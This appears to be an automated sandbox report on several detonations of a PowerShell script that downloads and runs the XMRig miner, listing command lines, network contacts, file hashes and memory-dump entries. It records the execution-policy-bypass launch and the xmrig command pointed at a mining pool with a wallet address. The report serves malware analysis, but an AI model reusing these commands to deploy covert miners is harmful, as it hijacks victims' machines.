C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/2056-0-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/2056-1-0x0000019B3A740000-0x0000019B3A762000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_srvxff0y.exd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2056-10-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/2056-11-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/2056-12-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/2056-15-0x0000019B3A7D0000-0x0000019B3A7DA000-memory.dmp

memory/2056-14-0x0000019B3A7E0000-0x0000019B3A7F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4536-46-0x0000017D530D0000-0x0000017D530F0000-memory.dmp

memory/2056-47-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/2056-48-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/4536-49-0x0000017D54AD0000-0x0000017D54AF0000-memory.dmp

memory/4536-50-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-51-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-53-0x0000017D54B10000-0x0000017D54B30000-memory.dmp

memory/4536-52-0x0000017D54AF0000-0x0000017D54B10000-memory.dmp

memory/4536-54-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-55-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-57-0x0000017D54B10000-0x0000017D54B30000-memory.dmp

memory/4536-56-0x0000017D54AF0000-0x0000017D54B10000-memory.dmp

memory/4536-58-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-59-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-60-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-61-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-62-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-63-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-64-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-65-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-66-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-67-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-68-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-69-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-70-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-71-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-72-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-73-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-74-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-75-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-76-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-77-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-78-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-79-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-80-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-81-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-82-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-83-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-84-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-85-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-86-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-87-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-88-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-89-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-90-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-91-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-92-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-93-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-94-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-95-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-96-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-97-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-98-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-99-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-100-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-101-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-102-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-103-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-104-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-105-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-106-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-107-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-108-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-109-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-110-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-111-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-112-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-113-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-114-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-115-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-116-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 20:43
Platform win10v2004-20240426-en
Max time kernel 1795s
Max time network 1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 43.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 219.183.117.104.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 200.64.52.20.in-addr.arpa udp

Files

memory/2156-0-0x00007FFCDBF83000-0x00007FFCDBF85000-memory.dmp

memory/2156-1-0x0000015540E70000-0x0000015540E92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vemzk220.a10.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2156-11-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2156-12-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2156-13-0x00007FFCDBF83000-0x00007FFCDBF85000-memory.dmp

memory/2156-14-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2156-16-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2156-18-0x0000015541360000-0x000001554136A000-memory.dmp

memory/2156-17-0x0000015541370000-0x0000015541382000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2892-49-0x0000016F81900000-0x0000016F81920000-memory.dmp

memory/2892-51-0x0000016F83200000-0x0000016F83220000-memory.dmp

memory/2892-50-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-52-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-53-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-56-0x0000016F83240000-0x0000016F83260000-memory.dmp

memory/2892-55-0x0000016F83220000-0x0000016F83240000-memory.dmp

memory/2156-54-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2892-57-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-58-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-59-0x0000016F83220000-0x0000016F83240000-memory.dmp

memory/2892-60-0x0000016F83240000-0x0000016F83260000-memory.dmp

memory/2892-61-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-62-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-63-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.14:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dy4gwjpz.0mn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win11-20240426-en

Max time kernel

1794s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zc2zx15s.ngf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:44

Platform

win11-20240508-en

Max time kernel

1797s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwnyjvf1.sow.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

